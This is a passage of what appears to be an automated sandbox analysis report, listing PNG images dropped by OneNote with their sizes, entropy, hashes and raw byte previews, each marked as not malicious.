                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
